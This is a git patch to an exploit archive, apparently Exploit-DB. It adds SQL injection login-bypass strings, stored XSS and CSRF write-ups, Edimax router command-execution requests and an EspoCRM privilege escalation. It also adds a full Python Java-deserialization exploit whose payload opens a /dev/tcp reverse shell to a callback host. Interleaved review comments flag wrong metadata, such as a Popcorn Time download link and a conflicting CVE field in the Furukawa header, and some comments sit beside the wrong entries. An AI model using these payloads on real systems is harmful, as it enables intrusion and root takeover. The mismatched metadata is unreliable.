@@ -0,0 +1,49 @@ +# Exploit Title: User Management System 2.0 - Authentication Bypass +# Author: Besim ALTINOK +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ +# Version: v2.0 +# Tested on: Xampp +# Credit: İsmail BOZKURT + + +------ Details: + +1- Vulnerable code is here (admin login: /admin/index.php): + +0) +{ + $extra="manage-users.php"; + $_SESSION['login']=$_POST['username']; + $_SESSION['id']=$num['id']; +echo ""; +exit(); +} +else +{ + $_SESSION['action1']="*Invalid username or password"; + $extra="index.php"; +echo ""; +exit(); +} +} + +2- We can bypass authentication with SQLi: + +Bypass code (user and admin login panel): + +Username: pentester' or'1'=1# +Password : pentester' or'1'=1# + +Finally: There is a lot of SQLi input in this project. Like, login, +registration, forgot password ... \ No newline at end of file diff --git a/exploits/php/webapps/48370.txt b/exploits/php/webapps/48370.txt new file mode 100644 index 000000000..7f1ad6b7c --- /dev/null +++ b/exploits/php/webapps/48370.txt 
@@ -0,0 +1,42 @@ +# Exploit Title: Complaint Management System 4.2 - Persistent Cross-Site Scripting +# Author: Besim ALTINOK +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/complaint-management-sytem/ +# Version: v4.2 +# Tested on: Xampp +# Credit: İsmail BOZKURT + +------ Details: + +1- Vulnerable code is here: http://localhost/cms/users/registration.php +2- Vulnerable code: + +Insert user registration information to the DB without filtering. + +if(isset($_POST['submit'])) +{ +$fullname=$_POST['fullname']; +$email=$_POST['email']; +$password=md5($_POST['password']); +$contactno=$_POST['contactno']; +$status=1; +$query=mysqli_query($con,"insert into +users(fullName,userEmail,password,contactNo,status) +values('$fullname','$email','$password','$contactno','$status')"); +$msg="Registration successfull. Now You can login !"; +} +?> + +3- In the admin dashboard: + +Get fullName from DB and print it without any filtering + + +'s profile + + +4- If we insert "fullName" as "script>prompt(2)", we can perform +this attack as "Stored XSS" + +5- Picture in the Attachemnt +--------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/48371.txt b/exploits/php/webapps/48371.txt new file mode 100644 index 000000000..681c6b849 --- /dev/null +++ b/exploits/php/webapps/48371.txt 
@@ -0,0 +1,40 @@ +# Exploit Title: Complaint Management System 4.2 - Authentication Bypass +# Author: Besim ALTINOK +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/complaint-management-sytem/ +# Version: v4.2 +# Tested on: Xampp +# Credit: İsmail BOZKURT + +------ Details: + +1- Vulnerable code is here: + +if(isset($_POST['submit'])) +{ +$username=$_POST['username']; +$password=md5($_POST['password']); +$ret=mysqli_query($con,"SELECT * FROM admin WHERE +username='$username' and password='$password'"); +$num=mysqli_fetch_array($ret); +if($num>0) +{ +$extra="change-password.php";// +$_SESSION['alogin']=$_POST['username']; +$_SESSION['id']=$num['id']; +$host=$_SERVER['HTTP_HOST']; +$uri=rtrim(dirname($_SERVER['PHP_SELF']),'/\\'); +header("location:http://$host$uri/$extra"); +exit(); +} + +2- We can bypass authentication with SQLi: + +Bypass code (admin login panel): + +Username: pentester' or'1'=1# +Password : pentester' or'1'=1# + +Finally: There is a lot of SQLi input in this project. Like, login, +registration, forgot password ... +----------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/48372.txt b/exploits/php/webapps/48372.txt new file mode 100644 index 000000000..61f2dda41 --- /dev/null +++ b/exploits/php/webapps/48372.txt 
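Review bot: The injected password shown in this hunk (`Password : pentester' or'1'=1#`) cannot influence the query in the quoted code, because `$password=md5($_POST['password'])` hashes the value before it is concatenated into the SQL string; only `$username` reaches the query unescaped, and the write-up should say so instead of presenting both fields as injection points. The quoted code also ends one brace short of the `if(isset($_POST['submit']))` block, so the excerpt appears truncated. A remediation line for maintainers — a prepared statement with bound parameters (`mysqli_prepare`) for the admin login query — would make the advisory useful to the defending side as well.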
@@ -0,0 +1,29 @@ +# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User) +# Author: Besim ALTINOK +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/complaint-management-sytem/ +# Version: v4.2 +# Tested on: Xampp +# Credit: İsmail BOZKURT +************************************************* +Detail: + +You can perform CSRF Attack for all the functions. + +---------------------------------------------- + +CSRF PoC for Delete User +---------------------------------------------- +This request performs over the GET request with uid. +------------------------------------------------------------------------ + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e715555db..5b809e378 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42396,6 +42396,7 @@ id,file,description,date,author,type,platform,port 47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware, 47895,exploits/java/webapps/47895.py,"Oracle Weblogic 10.3.6.0.0 - Remote Command Execution",2020-01-09,james,webapps,java, 47898,exploits/php/webapps/47898.py,"Pandora 7.0NG - Remote Code Execution",2020-01-10,Askar,webapps,php, +48368,exploits/php/webapps/48368.txt,"User Management System 2.0 - Persistent Cross-Site Scripting",2020-04-23,Besim,webapps,php, 47899,exploits/php/webapps/47899.py,"PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution",2020-01-10,.:UND3R:.,webapps,php, 47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux, 47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple, 
@@ -42604,3 +42605,9 @@ id,file,description,date,author,type,platform,port 48365,exploits/hardware/webapps/48365.txt,"Edimax EW-7438RPn - Information Disclosure (WiFi Password)",2020-04-22,Besim,webapps,hardware, 48366,exploits/hardware/webapps/48366.txt,"Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)",2020-04-22,Besim,webapps,hardware, 48367,exploits/linux/webapps/48367.txt,"Mahara 19.10.2 CMS - Persistent Cross-Site Scripting",2020-04-22,Vulnerability-Lab,webapps,linux, +48369,exploits/php/webapps/48369.txt,"User Management System 2.0 - Authentication Bypass",2020-04-23,Besim,webapps,php, +48370,exploits/php/webapps/48370.txt,"Complaint Management System 4.2 - Persistent Cross-Site Scripting",2020-04-23,Besim,webapps,php, +48371,exploits/php/webapps/48371.txt,"Complaint Management System 4.2 - Authentication Bypass",2020-04-23,Besim,webapps,php, +48372,exploits/php/webapps/48372.txt,"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)",2020-04-23,Besim,webapps,php, +48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi, +48375,exploits/ios/webapps/48375.txt,"Sky File 2.1.0 iOS - Directory Traversal",2020-04-23,Vulnerability-Lab,webapps,ios, From 7b87f30fbc6b26b55e0841b8129656ae17402c9f Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 25 Apr 2020 05:01:51 +0000 Subject: [PATCH 18/18] DB: 2020-04-25 5 changes to exploits/shellcodes Popcorn Time 6.2 - 'Update service' Unquoted Service Path EspoCRM 5.8.5 - Privilege Escalation Edimax EW-7438RPn 1.13 - Remote Code Execution Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) --- exploits/hardware/webapps/48377.txt | 75 ++++++ exploits/java/webapps/48380.txt | 338 ++++++++++++++++++++++++++++ exploits/multiple/webapps/48376.txt | 40 ++++ exploits/windows/local/48378.txt | 37 +++ files_exploits.csv | 4 + files_shellcodes.csv | 1 + shellcodes/linux/48379.c | 194 ++++++++++++++++ 7 files changed, 689 insertions(+) create mode 100644 exploits/hardware/webapps/48377.txt create mode 100644 exploits/java/webapps/48380.txt create mode 100644 exploits/multiple/webapps/48376.txt create mode 100644 exploits/windows/local/48378.txt create mode 100644 shellcodes/linux/48379.c diff --git a/exploits/hardware/webapps/48377.txt b/exploits/hardware/webapps/48377.txt new file mode 100644 index 000000000..6d6bf69e5 --- /dev/null +++ b/exploits/hardware/webapps/48377.txt @@ -0,0 +1,75 @@ +# Exploit Title: Edimax EW-7438RPn 1.13 - Remote Code Execution +# Date: 2020-04-23 +# Exploit Author: Besim ALTINOK +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Version:1.13 +# Tested on: Edimax EW-7438RPn 1.13 Version + +------ + +NOTE: This device configurated with root permissions. So you can run the +command as root + +Here is the detail(s) of the RCE(s) + +1- Content of the mp.asp file + +
+   +   +   +
+ +RCE Detail: +------------------------------- + +POST /goform/mp HTTP/1.1 +Host: 192.168.2.2 +User-Agent: Mozilla/5.0 ********************* +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 25 +DNT: 1 +Authorization: Basic YWRtaW46MTIzNA== +Connection: close +Cookie: language=1 +Upgrade-Insecure-Requests: 1 + +command=||busybox+ls&getID= + +------------------------------- + +2- Content of the syscmd.asp + +
+ +This page can be used to run target system command. +
+ + + + + +RCE Detail: +------------------------------- + +POST /goform/formSysCmd HTTP/1.1 +Host: 192.168.2.2 +User-Agent: Mozilla/5.0 ********************* +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 11 +DNT: 1 +Authorization: Basic YWRtaW46MTIzNA== +Connection: close +Cookie: language=1 +Upgrade-Insecure-Requests: 1 + +sysCmd="command to here" \ No newline at end of file diff --git a/exploits/java/webapps/48380.txt b/exploits/java/webapps/48380.txt new file mode 100644 index 000000000..6bc0a0374 --- /dev/null +++ b/exploits/java/webapps/48380.txt 
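Review bot: Both request examples in this hunk carry `Authorization: Basic YWRtaW46MTIzNA==`, so what is demonstrated is command execution by an already-authenticated administrator, yet neither the title nor the description states that credentials are required; the header should say "Authenticated Remote Code Execution" (or equivalent), since pre-auth versus post-auth is the first thing a triager needs for severity. The second case, `/goform/formSysCmd`, sits behind a page whose own text reads "This page can be used to run target system command", which looks like a documented administrative feature rather than an injection flaw — if that is the case the advisory should say so or drop it. The opening `NOTE: This device configurated with root permissions` is presumably meant as "the web server runs as root, so commands execute as root"; it should be worded that way. A short mitigation line (change the default credentials, keep the management interface off untrusted networks, apply the vendor fix when available) would help readers on the defending side.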
@@ -0,0 +1,338 @@ +# Exploit Title: Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution +# Date: 2020-04-24 +# Vendor Homepage: https://www.tecnoredsa.com.ar +# Exploit Authors: LiquidWorm +# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe +# Version: 2.8.1 +# CVE : N/A + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# +# +# Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution +# +# +# Vendor: Furukawa Electric Co., Ltd. | Tecnored SA +# Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar +# Affected version: APROS Evolution | 2.8.1 +# FURUKAWA | 2.7.10 +# ConsciusMAP | 2.6.4 +# | 2.3.1 +# | 2.1.49 +# | 2.1.36 +# | 2.1.31 +# | 2.1.18 +# | 2.1.16 +# | 2.1.15 +# | 2.1.1 +# | 2.0.1174 +# | 1.8 +# | 1.4.70 +# +# Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored +# provisioning system for FTTH networks. Complete administration of +# your entire external FTTH network plant, including from the ONUs +# installed in each end customer, to the wiring and junction boxes. +# Unify all the management of your FTTH network on a single platform. +# Unify all your data, whether from customers, your network, or the +# external plant in one place. APROS FTTH allows you to manage your +# entire FTTH network in a simple and globalized way with just one +# click, without being a network expert. Includes services such as: +# bandwidth limitation, Turbo Internet for time plans, BURST Internet, +# QinQ for companies, and many more. General consumption graphics and +# per customer in real time. Captive Portal for cutting or suspension +# of the service. +# +# Desc: The FTTH provisioning solution suffers from an unauthenticated +# remote code execution vulnerability due to an unsafe deserialization +# of Java objects (ViewState) triggered via the 'javax.faces.ViewState' +# HTTP POST parameter. 
The deserialization can cause the vulnerable JSF +# web application to execute arbitrary Java functions, malicious Java +# bytecode, and system shell commands with root privileges. +# +# =================================================================== +# $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444 +# [*] Setting up valid URL path +# [*] Starting callback listener child thread +# [*] Starting handler on port 4444 +# [*] Sending serialized object +# [*] Connection from 172.16.0.1:48446 +# [*] You got shell! +# tomcat7@zslab:/var/lib/tomcat7$ id +# uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa) +# tomcat7@zslab:/var/lib/tomcat7$ sudo su +# id +# uid=0(root) gid=0(root) grupos=0(root) +# exit +# tomcat7@zslab:/var/lib/tomcat7$ exit +# *** Connection closed by remote host *** +# =================================================================== +# +# Tested on: Apache Tomcat/7.0.68 +# Apache Tomcat/7.0.52 +# Apache MyFaces/2.2.1 +# Apache MyFaces/2.1.17 +# Apache MyFaces/2.0.10 +# GNU/Linux 4.4.0-173 +# GNU/Linux 4.4.0-137 +# GNU/Linux 4.4.0-101 +# GNU/Linux 4.4.0-83 +# GNU/Linux 3.15.0 +# GNU/Linux 3.13.0-32 +# PrimeFaces/4.0.RC1 +# Apache-Coyote/1.1 +# ACC Library 3.1 +# Ubuntu 16.04.2 +# Ubuntu 14.04.2 +# Java/1.8.0_242 +# Java/1.8.0_181 +# Java/1.8.0_131 +# Java/1.7.0_79 +# MySQL 5.7.29 +# MySQL 5.7.18 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# Macedonian Information Security Research and Development Laboratory +# Zero Science Lab - https://www.zeroscience.mk - @zeroscience +# +# +# Advisory ID: ZSL-2020-5565 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php +# +# CVE ID: CVE-2020-12133 +# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133 +# +# +# 24.02.2020 +# + +import os############# +import sys############ +import gzip#######o### +import zlib########### +import socket######### +import base64######### +import urllib######### +import requests####### +import 
telnetlib###### +import threading###### +import subprocess##### + +from io import BytesIO +from time import sleep +from flash import blic + +class Optics: + + def __init__(self): + self.callback = None# + self.headers = None## + self.payload = None## + self.target = None### + self.lport = None#### + self.path = None##### + self.cmd = None###### + + def allears(self): + telnetus = telnetlib.Telnet() + print("[*] Starting handler on port {}".format(self.lport)) + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", self.lport)) + while True: + try: + s.settimeout(8) + s.listen(1) + conn, addr = s.accept() + print("[*] Connection from {}:{}".format(addr[0], addr[1])) + telnetus.sock = conn + except socket.timeout as p: + print("[!] Probably not vulnerable... ({poraka})".format(poraka=p)) + print("[+] Check your port mappings.") + s.close() + exit(0) + break + + print("[*] You got shell!") + + # + # UnicodeDecodeError dirty fix: + # /usr/lib/python3.6/telnetlib.py + # Change from 'ascii' to 'utf-8' (Lines: 553 and 556) + # + + telnetus.interact() + conn.close() + + def thricer(self): + print("[*] Starting callback listener child thread") + konac = threading.Thread(name="ZSL", target=self.allears) + konac.start() + sleep(1) + self.gadget() + + def gadget(self): + self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/" + self.cmd += self.callback + self.cmd += "/" + self.cmd += str(self.lport) + self.cmd += "<&1" + + payload = b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C" + payload += b"\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03" + payload += b"\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\x00\x00\x00" + payload += b"\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63" + payload += b"\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E" + payload += b"\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\x54\x69\x65\x64\x4D\x61" + payload += 
b"\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02" + payload += b"\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61" + payload += b"\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74" + payload += b"\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B" + payload += b"\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68" + payload += b"\x75\x62\x2E\x63\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66" + payload += b"\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\x00\x2A\x6F\x72\x67\x2E" + payload += b"\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F" + payload += b"\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A" + payload += b"\x79\x4D\x61\x70\x6E\xE5\x94\x82\x9E\x79\x10\x94\x03\x00\x01\x4C\x00" + payload += b"\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61" + payload += b"\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C" + payload += b"\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72" + payload += b"\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61" + payload += b"\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65" + payload += b"\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43" + payload += b"\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72" + payload += b"\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72" + payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72" + payload += b"\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F" + payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73" + payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72" + payload += b"\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E" + payload += 
b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73" + payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00" + payload += b"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70" + payload += b"\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C" + payload += b"\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E" + payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D" + payload += b"\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69" + payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\x00\x03\x78\x70\x76\x72" + payload += b"\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69" + payload += b"\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72" + payload += b"\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D" + payload += b"\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66" + payload += b"\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72" + payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38" + payload += b"\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A" + payload += b"\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C" + payload += b"\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C" + payload += b"\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B" + payload += b"\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12" + payload += b"\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73" + payload += b"\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E" + payload += b"\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C" + payload += b"\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75" + payload += 
b"\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C" + payload += b"\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A" + payload += b"\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D" + payload += b"\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72" + payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E" + payload += b"\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00" + payload += b"\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00" + payload += b"\x00\x02\x70\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69" + payload += b"\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72" + payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63" + payload += b"\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00" + payload += b"\x7E\x00\x18\x73\x71\x00\x7E\x00\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61" + payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2" + payload += b"\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00" + payload += (bytes(chr(len(self.cmd)), "utf-8"))##################################" + payload += (bytes(self.cmd, "utf-8"))############################################" + payload += b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01" + payload += b"\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61" + payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12\xE2" + payload += b"\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65" + payload += b"\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D" + payload += b"\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00" + payload += b"\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E" + payload += 
b"\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00" + payload += b"\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09" + payload += b"\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00" + payload += b"\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"#######" + + jbits = BytesIO() + with gzip.GzipFile(fileobj=jbits, mode="wb") as f: + f.write(payload) + serialize = base64.b64encode(jbits.getvalue()) + print("[*] Sending serialized object") + + self.headers = { + "Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn", + "Content-Type" : "application/x-www-form-urlencoded", + "User-Agent" : "ISP-Eye/2.51", + "Connection" : "keep-alive"} + + self.paramz={"javax.faces.ViewState" : serialize} + #sleep(1) + r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz) + + def par(self): + if len(sys.argv) != 4: + self.usage() + else: + self.target = sys.argv[1] + self.callback = sys.argv[2] + self.lport = int(sys.argv[3]) + if not "http" in self.target: + self.target = "http://{}".format(self.target) + + def check(self): + print("[*] Setting up valid URL path") + try: + r = requests.get(self.target) + app = r.text + if not "FURUKAWA" in app and not "APROS" in app: + print("[!] App not detected.") + exit(0) + if "FURUKAWA" in app: + self.path = "/FURUKAWA/" + elif "APROS" in app: + self.path = "/APROS/" + else: + exit(-1337) + except Exception as p: + print("[!] 
Somethingz wrong: \n--\n{poraka}".format(poraka=p)) + exit(0) + + def framed(self): + naslov = """ + o===--------------------------------------===o + | | + | Furukawa Electric / Tecnored | + | APROS Evolution | FURUKAWA | ConsciusMAP | + | Fiber-To-The-Home (FTTH) | + | | + | Java Deserialization Remote Code Execution | + | ZSL-2020-5565 | + | | + o===--------------------------------------===o + || + || + (\__/)|| + (•ㅅ•)|| + /   づ| + """ + print(naslov) + + def usage(self): + self.framed() + print("Usage: ./furukawa.py ") + print("Example: ./furukawa.py 172.16.0.1:8080 172.16.0.200 4444\n") + exit(0) + + def main(self): + self.par()########() + self.check()######() + self.thricer()####() + +if __name__ == '__main__': + Optics().main() \ No newline at end of file diff --git a/exploits/multiple/webapps/48376.txt b/exploits/multiple/webapps/48376.txt new file mode 100644 index 000000000..af82da422 --- /dev/null +++ b/exploits/multiple/webapps/48376.txt 
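Review bot: The header block of this hunk carries metadata that does not belong to this entry: `# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe` is the Popcorn Time installer also listed in 48378.txt in this same commit, and `# CVE : N/A` contradicts the `CVE ID: CVE-2020-12133` given further down in the script's comment block. The CVE link is malformed as well — `name=2020-12133` lacks the `CVE-` prefix and should read `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12133`. Suggest replacing the Software Link with the product web page already named in the body (or removing it) and setting the header to `# CVE : CVE-2020-12133`, so the index fields match the advisory text.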
@@ -0,0 +1,40 @@ +# Exploit Title: EspoCRM 5.8.5 - Privilege Escalation +# Author: Besim ALTINOK +# Vendor Homepage: https://www.espocrm.com +# Software Link: https://www.espocrm.com/downloads/EspoCRM-5.8.5.zip +# Version: v5.8.5 +# Tested on: Xampp +# Credit: İsmail BOZKURT + +------------- + +Details: +-------------------------------------------- + +1- When we sent a request to the /api/v1/App/user, we can see user details +--- +First Request: +--------------------------- +GET /api/v1/App/user HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 ************************* +Authorization: Basic ************************************* +Espo-Authorization: ************************************* +Espo-Authorization-By-Token: true +X-Requested-With: XMLHttpRequest +DNT: 1 +Connection: close +Cookie: auth-token-secret=cdc7f7*********************377; +auth-username=user1; auth-token=3a874a********************************48 +---- + +2- When we decode Basic Authorization and Espo-Authorization and change the +value with another username (like admin) in the first request, we can see +other user information and access like BOSS +---------- + +3- Some Examples and encode technique + +- BASE64: +First type: dXNlcjE6MQ== (user1:1) +Second type: user1:MzNmYzYwZDQ1ZDI2YWNhODYxZTZlYjdiMDgwMjk4TkRn (user1:pass) \ No newline at end of file diff --git a/exploits/windows/local/48378.txt b/exploits/windows/local/48378.txt new file mode 100644 index 000000000..68c3eb333 --- /dev/null +++ b/exploits/windows/local/48378.txt 
